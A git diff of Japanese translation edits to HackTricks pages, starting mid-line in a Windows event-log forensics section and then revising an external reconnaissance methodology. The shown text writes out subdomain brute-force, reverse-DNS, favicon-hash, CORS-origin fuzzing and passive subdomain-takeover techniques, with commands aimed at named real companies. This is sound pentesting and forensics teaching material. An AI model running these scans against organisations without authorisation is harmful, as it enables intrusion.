AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen ## Windowsイベント -Windowsイベント内に表示される情報は次のとおりです: +Windowsイベントに表示される情報は次のとおりです: - 何が起こったか - タイムスタンプ(UTC + 0) @@ -390,7 +391,7 @@ Windowsイベント内に表示される情報は次のとおりです: - 関与したホスト(ホスト名、IP) - アクセスされた資産(ファイル、フォルダー、プリンター、サービス) -ログは、Windows Vista以前では`C:\Windows\System32\config`にあり、Windows Vista以降では`C:\Windows\System32\winevt\Logs`にあります。Windows Vista以前はイベントログはバイナリ形式であり、以降は**XML形式**で、**.evtx**拡張子を使用しています。 +ログは、Windows Vista以前は`C:\Windows\System32\config`にあり、Windows Vista以降は`C:\Windows\System32\winevt\Logs`にあります。Windows Vista以前はイベントログはバイナリ形式であり、以降は**XML形式**で、**.evtx**拡張子を使用しています。 イベントファイルの場所は、SYSTEMレジストリの**`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**で見つけることができます。 @@ -398,7 +399,7 @@ Windowsイベント内に表示される情報は次のとおりです: ## Windowsセキュリティイベントログの理解 -アクセスイベントは、`C:\Windows\System32\winevt\Security.evtx`にあるセキュリティ構成ファイルに記録されます。このファイルのサイズは調整可能で、容量に達すると古いイベントが上書きされます。記録されたイベントには、ユーザーログインとログオフ、ユーザーアクション、セキュリティ設定の変更、ファイル、フォルダー、共有資産へのアクセスが含まれます。 +アクセスイベントは、`C:\Windows\System32\winevt\Security.evtx`にあるセキュリティ構成ファイルに記録されます。このファイルのサイズは調整可能で、容量に達すると古いイベントが上書きされます。記録されたイベントには、ユーザーログインとログオフ、ユーザーアクション、セキュリティ設定の変更、ファイル、フォルダー、および共有資産へのアクセスが含まれます。 ### ユーザー認証のための主要なイベントID: @@ -409,18 +410,18 @@ Windowsイベント内に表示される情報は次のとおりです: #### EventID 4634/4647内のサブタイプ: -- **インタラクティブ (2)**: 直接のユーザーログイン。 +- **インタラクティブ (2)**: 直接ユーザーログイン。 - **ネットワーク (3)**: 共有フォルダーへのアクセス。 - **バッチ (4)**: バッチプロセスの実行。 - **サービス (5)**: サービスの起動。 - **プロキシ (6)**: プロキシ認証。 -- **ロック解除 (7)**: パスワードで画面がロック解除されました。 +- **アンロック (7)**: パスワードで画面が解除されました。 - **ネットワーククリアテキスト (8)**: IISからのクリアテキストパスワードの送信。 - **新しい資格情報 (9)**: アクセスのために異なる資格情報を使用。 - **リモートインタラクティブ (10)**: リモートデスクトップまたはターミナルサービスのログイン。 - **キャッシュインタラクティブ (11)**: ドメインコントローラーに連絡せずにキャッシュされた資格情報でログイン。 - **キャッシュリモートインタラクティブ (12)**: キャッシュされた資格情報でのリモートログイン。 -- **キャッシュロック解除 (13)**: キャッシュされた資格情報でのロック解除。 +- **キャッシュアンロック (13)**: キャッシュされた資格情報での解除。 #### EventID 4625のステータスおよびサブステータスコード: @@ -435,7 +436,7 @@ Windowsイベント内に表示される情報は次のとおりです: - **0xC0000133**: 時間同期の問題 - クライアントとサーバー間の大きな時間の不一致は、パス・ザ・チケットのようなより高度な攻撃を示す可能性があります。 - **0xC0000224**: 強制的なパスワード変更が必要 - 頻繁な強制変更は、アカウントセキュリティを不安定にしようとする試みを示唆するかもしれません。 - **0xC0000225**: セキュリティの問題ではなく、システムバグを示します。 -- **0xC000015b**: 拒否されたログオンタイプ - サービスログオンを実行しようとするユーザーなど、不正なログオンタイプでのアクセスの試み。 +- **0xC000015b**: 拒否されたログオンタイプ - サービスログオンを実行しようとするユーザーなど、不正なログオンタイプでのアクセス試行。 #### EventID 4616: @@ -461,7 +462,7 @@ Windowsイベント内に表示される情報は次のとおりです: ### Windowsイベントの回復 -削除されたWindowsイベントを回復する可能性を高めるために、疑わしいコンピュータの電源を直接抜いてシャットダウンすることをお勧めします。**Bulk_extractor**は、`.evtx`拡張子を指定する回復ツールで、これらのイベントを回復しようとする際に推奨されます。 +削除されたWindowsイベントを回復する可能性を高めるために、疑わしいコンピュータの電源を直接抜いてシャットダウンすることをお勧めします。**Bulk_extractor**は、`.evtx`拡張子を指定する回復ツールであり、そのようなイベントを回復しようとする際に推奨されます。 ### Windowsイベントを通じて一般的な攻撃を特定する @@ -473,11 +474,11 @@ Windowsイベント内に表示される情報は次のとおりです: #### 時間変更 -EventID 4616によって記録され、システム時間の変更は法医学的分析を複雑にする可能性があります。 +EventID 4616によって記録され、システム時間の変更はフォレンジック分析を複雑にする可能性があります。 #### USBデバイストラッキング -USBデバイストラッキングに役立つシステムイベントIDには、初回使用のための20001/20003/10000、ドライバー更新のための10100、挿入タイムスタンプのためのDeviceSetupManagerからのEventID 112が含まれます。 +USBデバイストラッキングに役立つシステムイベントIDには、初回使用のための20001/20003/10000、ドライバー更新のための10100、挿入タイムスタンプのためのEventID 112が含まれます。 #### システム電源イベント @@ -485,6 +486,6 @@ EventID 6005はシステムの起動を示し、EventID 6006はシャットダ #### ログ削除 -セキュリティEventID 1102はログの削除を示し、法医学的分析にとって重要なイベントです。 +セキュリティEventID 1102はログの削除を示し、フォレンジック分析にとって重要なイベントです。 {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index af841836f..df2eef470 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -1,16 +1,16 @@ -# 外部リコンメソッド +# 外部リコンメソドロジー {{#include ../../banners/hacktricks-training.md}} ## 資産の発見 -> ある会社に属するすべてのものがスコープ内にあると言われており、その会社が実際に何を所有しているのかを把握したいと思っています。 +> ある会社に属するすべてのものがスコープ内にあると言われており、この会社が実際に何を所有しているのかを把握したいと思っています。 -このフェーズの目標は、**主要な会社が所有するすべての会社**を取得し、次にこれらの会社の**資産**を取得することです。そのために、私たちは以下を行います: +このフェーズの目標は、**主要な会社が所有するすべての会社**を取得し、次にこれらの会社の**資産**を取得することです。そのために、以下のことを行います: 1. 主要な会社の買収を見つけます。これにより、スコープ内の会社がわかります。 -2. 各会社のASN(もしあれば)を見つけます。これにより、各会社が所有するIP範囲がわかります。 -3. 逆whois検索を使用して、最初の会社に関連する他のエントリ(組織名、ドメインなど)を検索します(これは再帰的に行うことができます)。 +2. 各会社のASN(あれば)を見つけます。これにより、各会社が所有するIP範囲がわかります。 +3. 逆Whois検索を使用して、最初のものに関連する他のエントリ(組織名、ドメインなど)を検索します(これは再帰的に行うことができます)。 4. shodanの`org`および`ssl`フィルターなどの他の技術を使用して、他の資産を検索します(`ssl`トリックは再帰的に行うことができます)。 ### **買収** @@ -19,16 +19,16 @@ 1つのオプションは、[https://www.crunchbase.com/](https://www.crunchbase.com)を訪れ、**主要な会社**を**検索**し、**「買収」**を**クリック**することです。そこで、主要な会社によって買収された他の会社を見ることができます。\ もう1つのオプションは、主要な会社の**Wikipedia**ページを訪れ、**買収**を検索することです。 -> さて、この時点でスコープ内のすべての会社を把握しているはずです。彼らの資産を見つける方法を考えましょう。 +> さて、この時点でスコープ内のすべての会社を知っているはずです。彼らの資産を見つける方法を考えましょう。 ### **ASNs** 自律システム番号(**ASN**)は、**インターネット割り当て番号機関(IANA)**によって**自律システム**(AS)に割り当てられた**ユニークな番号**です。\ -**AS**は、外部ネットワークへのアクセスに対して明確に定義されたポリシーを持つ**IPアドレスのブロック**で構成され、単一の組織によって管理されますが、複数のオペレーターで構成される場合があります。 +**AS**は、外部ネットワークへのアクセスに対して明確に定義されたポリシーを持つ**IPアドレス**の**ブロック**で構成され、単一の組織によって管理されますが、複数のオペレーターで構成されることがあります。 -**会社が割り当てたASN**を見つけて、その**IP範囲**を特定することは興味深いです。**スコープ内のすべてのホスト**に対して**脆弱性テスト**を実施し、これらのIP内の**ドメイン**を探すことが興味深いでしょう。\ +**会社が割り当てたASN**を見つけて、その**IP範囲**を特定することは興味深いです。スコープ内のすべての**ホスト**に対して**脆弱性テスト**を実施し、これらのIP内の**ドメイン**を探すことが興味深いでしょう。\ [**https://bgp.he.net/**](https://bgp.he.net)で会社の**名前**、**IP**、または**ドメイン**で**検索**できます。\ -**会社の地域に応じて、これらのリンクはさらにデータを収集するのに役立つかもしれません:** [**AFRINIC**](https://www.afrinic.net) **(アフリカ)、** [**Arin**](https://www.arin.net/about/welcome/region/) **(北アメリカ)、** [**APNIC**](https://www.apnic.net) **(アジア)、** [**LACNIC**](https://www.lacnic.net) **(ラテンアメリカ)、** [**RIPE NCC**](https://www.ripe.net) **(ヨーロッパ)。とにかく、おそらくすべての**有用な情報**(IP範囲とWhois)は最初のリンクにすでに表示されています。 +**会社の地域によっては、これらのリンクがより多くのデータを収集するのに役立つかもしれません:** [**AFRINIC**](https://www.afrinic.net) **(アフリカ)、** [**Arin**](https://www.arin.net/about/welcome/region/) **(北アメリカ)、** [**APNIC**](https://www.apnic.net) **(アジア)、** [**LACNIC**](https://www.lacnic.net) **(ラテンアメリカ)、** [**RIPE NCC**](https://www.ripe.net) **(ヨーロッパ)。とにかく、おそらくすべての**有用な情報**(IP範囲とWhois)は最初のリンクにすでに表示されています。 ```bash #You can try "automate" this with amass, but it's not very recommended amass intel -org tesla @@ -51,7 +51,7 @@ bbot -t tesla.com -f subdomain-enum [INFO] bbot.modules.asn: +----------+---------------------+--------------+----------------+----------------------------+-----------+ ``` -あなたは、[http://asnlookup.com/](http://asnlookup.com)を使用して、組織のIP範囲を見つけることができます(無料のAPIがあります)。\ +あなたは、[http://asnlookup.com/](http://asnlookup.com)を使用して、組織のIP範囲を見つけることができます(無料APIがあります)。\ ドメインのIPとASNを見つけるには、[http://ipv4info.com/](http://ipv4info.com)を使用できます。 ### **脆弱性の探索** @@ -64,13 +64,13 @@ bbot -t tesla.com -f subdomain-enum > スコープ内のすべての企業とその資産を把握したので、スコープ内のドメインを見つける時が来ました。 -_以下の提案された技術では、サブドメインも見つけることができ、その情報は過小評価すべきではありません。_ +_次に提案する技術では、サブドメインも見つけることができ、その情報は過小評価すべきではありません。_ -まず、各企業の**主要なドメイン**を探すべきです。たとえば、_Tesla Inc._の主要なドメインは_ tesla.com_になります。 +まず、各企業の**主要なドメイン**を探すべきです。たとえば、_Tesla Inc._の場合、_tesla.com_になります。 ### **逆引きDNS** -ドメインのIP範囲をすべて見つけたので、**スコープ内のより多くのドメインを見つけるために、これらの**IPに対して**逆引きDNSルックアップを実行することができます。**被害者のDNSサーバーまたは一般的なDNSサーバー(1.1.1.1、8.8.8.8)を使用してみてください。 +ドメインのすべてのIP範囲を見つけたので、**スコープ内のより多くのドメインを見つけるために、それらの**IPに対して**逆引きDNSルックアップを実行することができます。**被害者のDNSサーバーまたは一般的なDNSサーバー(1.1.1.1、8.8.8.8)を使用してみてください。 ```bash dnsrecon -r -n #DNS reverse of all of the addresses dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns @@ -88,7 +88,7 @@ dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns - [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **無料** - [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **無料** - [https://www.reversewhois.io/](https://www.reversewhois.io) - **無料** -- [https://www.whoxy.com/](https://www.whoxy.com) - **無料**のウェブ、APIは無料ではありません。 +- [https://www.whoxy.com/](https://www.whoxy.com) - **無料**ウェブ、APIは無料ではありません。 - [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - 無料ではありません - [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - 無料ではありません(**100回の無料**検索のみ) - [https://www.domainiq.com/](https://www.domainiq.com) - 無料ではありません @@ -113,7 +113,7 @@ dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns ### **ファビコン** -同じファビコンアイコンのハッシュを探すことで、ターゲットに関連するドメインやサブドメインを見つけることができることをご存知でしたか?これは、[@m4ll0k2](https://twitter.com/m4ll0k2)によって作成されたツール[favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py)が行うことです。使用方法は次のとおりです: +同じファビコンアイコンのハッシュを探すことで、ターゲットに関連するドメインやサブドメインを見つけることができることをご存知ですか?これは、[@m4ll0k2](https://twitter.com/m4ll0k2)によって作成されたツール[favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py)が行うことです。使用方法は次のとおりです: ```bash cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt python3 favihash.py -f https://target/favicon.ico -t targets.txt -s @@ -141,7 +141,7 @@ return fhash ``` ### **Copyright / Uniq string** -異なるウェブサイト間で共有される可能性のある**文字列**をウェブページ内で検索します。同じ組織内での**著作権文字列**が良い例です。その後、**google**や他の**ブラウザ**、さらには**shodan**でその文字列を検索します: `shodan search http.html:"Copyright string"` +異なるウェブサイト間で共有される可能性のある**文字列**をウェブページ内で検索します。**著作権文字列**は良い例です。その後、**google**、他の**ブラウザ**、または**shodan**でその文字列を検索します: `shodan search http.html:"Copyright string"` ### **CRT Time** @@ -150,7 +150,7 @@ cronジョブを持つことは一般的です。 # /etc/crontab 37 13 */10 * * certbot renew --post-hook "systemctl reload nginx" ``` -サーバー上のすべてのドメイン証明書を更新することです。これは、これに使用されるCAが有効期限に生成された時間を設定していなくても、**証明書透明性ログで同じ会社に属するドメインを見つけることが可能である**ことを意味します。\ +サーバー上のすべてのドメイン証明書を更新することです。これは、これに使用されるCAが有効期間に生成された時間を設定していなくても、**証明書透明性ログで同じ会社に属するドメインを見つけることが可能である**ことを意味します。\ この[**詳細情報のための書き込み**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/)をチェックしてください。 ### Mail DMARC情報 @@ -159,9 +159,9 @@ cronジョブを持つことは一般的です。 ### **パッシブテイクオーバー** -人々がクラウドプロバイダーに属するIPにサブドメインを割り当て、ある時点で**そのIPアドレスを失い、DNSレコードを削除するのを忘れる**ことが一般的であるようです。したがって、単にクラウド(Digital Oceanなど)で**VMを生成する**ことで、実際に**いくつかのサブドメインを取得する**ことになります。 +人々がクラウドプロバイダーに属するIPにサブドメインを割り当て、ある時点で**そのIPアドレスを失い、DNSレコードを削除するのを忘れる**ことが一般的であるようです。したがって、クラウド(Digital Oceanなど)で**VMを生成する**だけで、実際に**いくつかのサブドメインを取得する**ことになります。 -[**この投稿**](https://kmsec.uk/blog/passive-takeover/)はそのストーリーを説明し、**DigitalOceanでVMを生成し**、**新しいマシンの** **IPv4**を取得し、**それにポイントするサブドメインレコードをVirustotalで検索する**スクリプトを提案しています。 +[**この投稿**](https://kmsec.uk/blog/passive-takeover/)はそのストーリーを説明し、**DigitalOceanでVMを生成し**、新しいマシンの**IPv4**を取得し、**それにポイントするサブドメインレコードをVirustotalで検索する**スクリプトを提案しています。 ### **その他の方法** @@ -171,7 +171,7 @@ cronジョブを持つことは一般的です。 IPスペースを所有する組織の名前がわかっているので、そのデータを使用してshodanで検索できます: `org:"Tesla, Inc."` 見つかったホストをチェックして、TLS証明書に新しい予期しないドメインがないか確認してください。 -メインウェブページの**TLS証明書**にアクセスし、**組織名**を取得し、その名前を持つ**TLS証明書**を持つすべてのウェブページを**shodan**内でフィルターを使用して検索できます: `ssl:"Tesla Motors"` または[**sslsearch**](https://github.com/HarshVaragiya/sslsearch)のようなツールを使用します。 +メインウェブページの**TLS証明書**にアクセスし、**組織名**を取得し、その名前を持つ**TLS証明書**を持つすべてのウェブページを**shodan**内で検索することができます。フィルター: `ssl:"Tesla Motors"`を使用するか、[**sslsearch**](https://github.com/HarshVaragiya/sslsearch)のようなツールを使用します。 **Assetfinder** @@ -179,9 +179,9 @@ IPスペースを所有する組織の名前がわかっているので、その ### **脆弱性の検索** -いくつかの[ドメインテイクオーバー](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover)をチェックしてください。ある会社が**ドメインを使用しているが、所有権を失った**可能性があります。十分に安価であれば、それを登録し、会社に知らせてください。 +いくつかの[ドメインテイクオーバー](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover)をチェックしてください。ある会社が**ドメインを使用しているが、所有権を失っている**かもしれません。それを登録して(十分に安ければ)会社に知らせてください。 -もし、資産発見で見つけたものとは異なるIPを持つ**ドメイン**を見つけた場合、**基本的な脆弱性スキャン**(NessusまたはOpenVASを使用)と、**nmap/masscan/shodan**を使用したいくつかの[**ポートスキャン**](../pentesting-network/index.html#discovering-hosts-from-the-outside)を実行するべきです。どのサービスが実行されているかに応じて、**この本で「攻撃」するためのいくつかのトリックを見つけることができます**。\ +もし**発見した資産の中で異なるIPを持つドメイン**を見つけた場合、**基本的な脆弱性スキャン**(NessusまたはOpenVASを使用)と、**nmap/masscan/shodan**を使用したいくつかの[**ポートスキャン**](../pentesting-network/index.html#discovering-hosts-from-the-outside)を実行するべきです。どのサービスが稼働しているかによって、**この本の中でそれらを「攻撃」するためのいくつかのトリックを見つけることができます**。\ _ドメインがクライアントによって制御されていないIP内にホストされていることがあるため、スコープ外であることに注意してください。注意が必要です。_ ## サブドメイン @@ -191,11 +191,11 @@ _ドメインがクライアントによって制御されていないIP内に 見つかった各ドメインのすべての可能なサブドメインを見つける時です。 > [!TIP] -> ドメインを見つけるためのいくつかのツールや技術は、サブドメインを見つけるのにも役立つことに注意してください。 +> ドメインを見つけるためのツールや技術のいくつかは、サブドメインを見つけるのにも役立つことに注意してください。 ### **DNS** -**DNS**レコードから**サブドメイン**を取得しようとしましょう。**ゾーン転送**も試みるべきです(脆弱な場合は報告する必要があります)。 +**DNS**レコードから**サブドメイン**を取得しようとしましょう。また、**ゾーン転送**を試みるべきです(脆弱な場合は報告する必要があります)。 ```bash dnsrecon -a -d tesla.com ``` @@ -252,7 +252,7 @@ theHarvester -d tesla.com -b "anubis, baidu, bing, binaryedge, bingapi, bufferov ``` 他にも**興味深いツール/API**があり、サブドメインの発見に特化していなくてもサブドメインを見つけるのに役立つことがあります。例えば: -- [**Crobat**](https://github.com/cgboal/sonarsearch)**:** API [https://sonar.omnisint.io](https://sonar.omnisint.io) を使用してサブドメインを取得します。 +- [**Crobat**](https://github.com/cgboal/sonarsearch)**:** API [https://sonar.omnisint.io](https://sonar.omnisint.io)を使用してサブドメインを取得します。 ```bash # Get list of subdomains in output from the API ## This is the API the crobat tool will use @@ -353,7 +353,7 @@ shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt ``` puredns bruteforce all.txt domain.com ``` -- [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) は、非同期にドメイン名をブルートフォースするために asyncio を使用します。 +- [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) は、asyncioを使用してドメイン名を非同期にブルートフォースします。 ``` aiodnsbrute -r resolvers -w wordlist.txt -vv -t 1024 domain.com ``` @@ -389,13 +389,13 @@ cat subdomains.txt | dmut -d /tmp/words-permutations.txt -w 100 \ #### スマートな順列生成 -- [**regulator**](https://github.com/cramppet/regulator): 詳細についてはこの[**投稿**](https://cramppet.github.io/regulator/index.html)を読んでくださいが、基本的には**発見されたサブドメイン**の**主要部分**を取得し、それらを混ぜてより多くのサブドメインを見つけます。 +- [**regulator**](https://github.com/cramppet/regulator): 詳細についてはこの[**投稿**](https://cramppet.github.io/regulator/index.html)を読んでくださいが、基本的には**発見されたサブドメイン**から**主要な部分**を取得し、それらを混ぜてより多くのサブドメインを見つけます。 ```bash python3 main.py adobe.com adobe adobe.rules make_brute_list.sh adobe.rules adobe.brute puredns resolve adobe.brute --write adobe.valid ``` -- [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ は、非常にシンプルで効果的なDNS応答ガイドアルゴリズムと組み合わされたサブドメインブルートフォースファズァです。提供された入力データセット(カスタマイズされた単語リストや過去のDNS/TLSレコードなど)を利用して、より対応するドメイン名を正確に合成し、DNSスキャン中に収集した情報に基づいてさらにループで拡張します。 +- [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ は、非常にシンプルで効果的なDNS応答ガイドアルゴリズムと組み合わされたサブドメインブルートフォースファッザーです。提供された入力データセット(カスタマイズされた単語リストや過去のDNS/TLSレコードなど)を利用して、より対応するドメイン名を正確に合成し、DNSスキャン中に収集した情報に基づいてさらにループで拡張します。 ``` echo www | subzuf facebook.com ``` @@ -435,19 +435,19 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com #https://github.com/codingo/VHostScan VHostScan -t example.com ``` -> [!NOTE] +> [!TIP] > この技術を使うことで、内部/隠れたエンドポイントにアクセスできる場合があります。 ### **CORSブルートフォース** -時々、_**Origin**_ ヘッダーに有効なドメイン/サブドメインが設定されている場合にのみ、_**Access-Control-Allow-Origin**_ ヘッダーを返すページを見つけることがあります。このようなシナリオでは、この動作を悪用して新しい**サブドメイン**を**発見**することができます。 +時々、_**Origin**_ ヘッダーに有効なドメイン/サブドメインが設定されているときにのみ、_**Access-Control-Allow-Origin**_ ヘッダーを返すページを見つけることがあります。これらのシナリオでは、この動作を悪用して新しい**サブドメイン**を**発見**することができます。 ```bash ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body ``` ### **バケットブルートフォース** -**サブドメイン**を探しているときは、**バケット**に**ポイント**しているかどうかに注意し、その場合は[**権限を確認**](../../network-services-pentesting/pentesting-web/buckets/index.html)**してください。**\ -また、この時点でスコープ内のすべてのドメインを知っているので、[**可能なバケット名をブルートフォースし、権限を確認**](../../network-services-pentesting/pentesting-web/buckets/index.html)してください。 +**サブドメイン**を探しているときは、**バケット**のいずれかに**ポイント**しているかどうかに注意し、その場合は[**権限を確認**](../../network-services-pentesting/pentesting-web/buckets/index.html)**してください。**\ +また、この時点でスコープ内のすべてのドメインを把握しているので、[**可能なバケット名をブルートフォースして権限を確認**](../../network-services-pentesting/pentesting-web/buckets/index.html)してください。 ### **モニタリング** @@ -456,17 +456,17 @@ ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http: ### **脆弱性の検索** 可能な[**サブドメインテイクオーバー**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover)を確認してください。\ -もし**サブドメイン**が**S3バケット**に**ポイント**している場合は、[**権限を確認**](../../network-services-pentesting/pentesting-web/buckets/index.html)してください。 +もし**サブドメイン**が**S3バケット**を指している場合は、[**権限を確認**](../../network-services-pentesting/pentesting-web/buckets/index.html)してください。 -もし**異なるIPを持つサブドメイン**を見つけた場合は、**基本的な脆弱性スキャン**(NessusやOpenVASを使用)と、**ポートスキャン**(**nmap/masscan/shodan**を使用)を実行する必要があります。実行中のサービスによっては、**この本の中で「攻撃」するためのいくつかのトリックを見つけることができます**。\ +もし**資産発見**で見つけたものとは異なるIPを持つ**サブドメイン**を見つけた場合は、**基本的な脆弱性スキャン**(NessusやOpenVASを使用)と、**ポートスキャン**(**nmap/masscan/shodan**を使用)を実行する必要があります。実行中のサービスに応じて、**この本の中でそれらを「攻撃」するためのいくつかのトリックを見つけることができます。**\ _サブドメインがクライアントによって制御されていないIP内にホストされている場合があるため、スコープ外であることに注意してください。_ ## IPs -初期のステップで**いくつかのIP範囲、ドメイン、サブドメイン**を**見つけたかもしれません**。\ -これらの範囲から**すべてのIPを収集**し、**ドメイン/サブドメイン(DNSクエリ)**のための時間です。 +初期のステップで、**いくつかのIP範囲、ドメイン、サブドメイン**を**見つけたかもしれません。**\ +これらの範囲から**すべてのIPを収集**し、**ドメイン/サブドメイン(DNSクエリ)**のために収集する時です。 -以下の**無料API**のサービスを使用すると、**ドメインとサブドメインによって使用された以前のIP**も見つけることができます。これらのIPはまだクライアントによって所有されている可能性があり、[**CloudFlareのバイパス**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)を見つける手助けになるかもしれません。 +以下の**無料API**のサービスを使用すると、**ドメインやサブドメインで使用された以前のIP**も見つけることができます。これらのIPはクライアントが所有している可能性があり、[**CloudFlareのバイパス**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)を見つける手助けになるかもしれません。 - [**https://securitytrails.com/**](https://securitytrails.com/) @@ -474,17 +474,17 @@ _サブドメインがクライアントによって制御されていないIP ### **脆弱性の検索** -**CDNに属さないすべてのIPをポートスキャン**してください(そこでは興味深いものは見つからない可能性が高いです)。発見された実行中のサービスでは、**脆弱性を見つけることができるかもしれません**。 +**CDNに属さないすべてのIPをポートスキャン**してください(そこでは興味深いものは見つからない可能性が高いです)。発見された実行中のサービスで**脆弱性を見つけることができるかもしれません**。 **ホストをスキャンする方法に関する**[**ガイド**](../pentesting-network/index.html)を見つけてください。 ## ウェブサーバーハンティング -> すべての企業とその資産を見つけ、スコープ内のIP範囲、ドメイン、サブドメインを知っています。ウェブサーバーを探す時間です。 +> すべての企業とその資産を見つけ、スコープ内のIP範囲、ドメイン、サブドメインを把握しました。ウェブサーバーを探す時です。 -前のステップで、**発見されたIPとドメインのリコン**をすでに実行している可能性があるため、**すべての可能なウェブサーバーをすでに見つけているかもしれません**。しかし、見つけていない場合は、スコープ内のウェブサーバーを探すための**迅速なトリック**を見ていきます。 +前のステップで、**発見したIPやドメインのリコンをすでに実施しているかもしれません**ので、**すべての可能なウェブサーバーをすでに見つけているかもしれません**。しかし、もし見つけていない場合は、スコープ内のウェブサーバーを探すための**迅速なトリック**を見ていきましょう。 -これは**ウェブアプリの発見**に**特化**しているため、**脆弱性**と**ポートスキャン**も実行する必要があります(**スコープによって許可されている場合**)。 +これは**ウェブアプリの発見**に向けられているため、**脆弱性**と**ポートスキャン**も実施する必要があります(**スコープによって許可されている場合**)。 **ウェブ**サーバーに関連する**オープンポート**を発見するための**迅速な方法**は、[**masscan**を使用することができます](../pentesting-network/index.html#http-port-discovery)。\ ウェブサーバーを探すためのもう一つの便利なツールは、[**httprobe**](https://github.com/tomnomnom/httprobe)**、**[**fprobe**](https://github.com/theblackturtle/fprobe)および[**httpx**](https://github.com/projectdiscovery/httpx)です。ドメインのリストを渡すだけで、ポート80(http)と443(https)に接続しようとします。さらに、他のポートを試すように指示することもできます: @@ -494,7 +494,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a ``` ### **スクリーンショット** -すべての**ウェブサーバー**を発見したので、どこから始めればよいかわからないかもしれません。そこで、シンプルにすべてのスクリーンショットを撮ることから始めましょう。**メインページ**を**見るだけ**で、**脆弱性**がある可能性の高い**奇妙な**エンドポイントを見つけることができます。 +すべての**ウェブサーバー**を発見したので、どこから始めるべきか**わからない**かもしれません。そこで、シンプルにして、すべてのサーバーのスクリーンショットを撮ることから始めましょう。**メインページ**を**見るだけで**、**脆弱性**がある可能性の高い**奇妙な**エンドポイントを見つけることができます。 提案されたアイデアを実行するには、[**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness)、[**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot)、[**Aquatone**](https://github.com/michenriksen/aquatone)、[**Shutter**](https://shutter-project.org/downloads/third-party-packages/)、[**Gowitness**](https://github.com/sensepost/gowitness)または[**webscreenshot**](https://github.com/maaaaz/webscreenshot)**を使用できます。** @@ -502,7 +502,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a ## パブリッククラウド資産 -企業に属する潜在的なクラウド資産を見つけるには、**その企業を特定するキーワードのリストから始める**べきです。たとえば、暗号通貨会社の場合、次のような単語を使用することがあります:`"crypto", "wallet", "dao", "", <"subdomain_names">`。 +企業に属する潜在的なクラウド資産を見つけるには、**その企業を特定するキーワードのリストから始める**べきです。たとえば、暗号通貨会社の場合、次のような単語を使用することがあります: `"crypto", "wallet", "dao", "", <"subdomain_names">`。 また、**バケットで使用される一般的な単語のワードリスト**も必要です: @@ -510,15 +510,15 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a - [https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt](https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt) - [https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt](https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt) -次に、それらの単語を使用して**順列**を生成する必要があります(詳細については[**第二ラウンドDNSブルートフォース**](#second-dns-bruteforce-round)を参照してください)。 +次に、これらの単語を使用して**順列**を生成する必要があります(詳細については[**第二ラウンドDNSブルートフォース**](#second-dns-bruteforce-round)を参照してください)。 -生成されたワードリストを使用して、[**cloud_enum**](https://github.com/initstring/cloud_enum)**、** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**、** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **または** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**を使用できます。** +生成されたワードリストを使用して、[**cloud_enum**](https://github.com/initstring/cloud_enum)**、**[**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**、**[**cloudlist**](https://github.com/projectdiscovery/cloudlist) **または** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**を使用できます。** -クラウド資産を探す際には、**AWSのバケットだけでなく、他のものも探す**べきです。 +クラウド資産を探す際には、**AWSのバケット以上のものを探す**べきです。 ### **脆弱性の検索** -**オープンバケットや公開されたクラウド機能**などを見つけた場合は、それに**アクセスして**、何を提供しているのか、悪用できるかどうかを確認する必要があります。 +**オープンバケットや公開されたクラウド機能**などを見つけた場合は、それに**アクセス**して、何を提供しているのか、どのように悪用できるかを確認する必要があります。 ## メール @@ -531,11 +531,11 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a ### **脆弱性の検索** 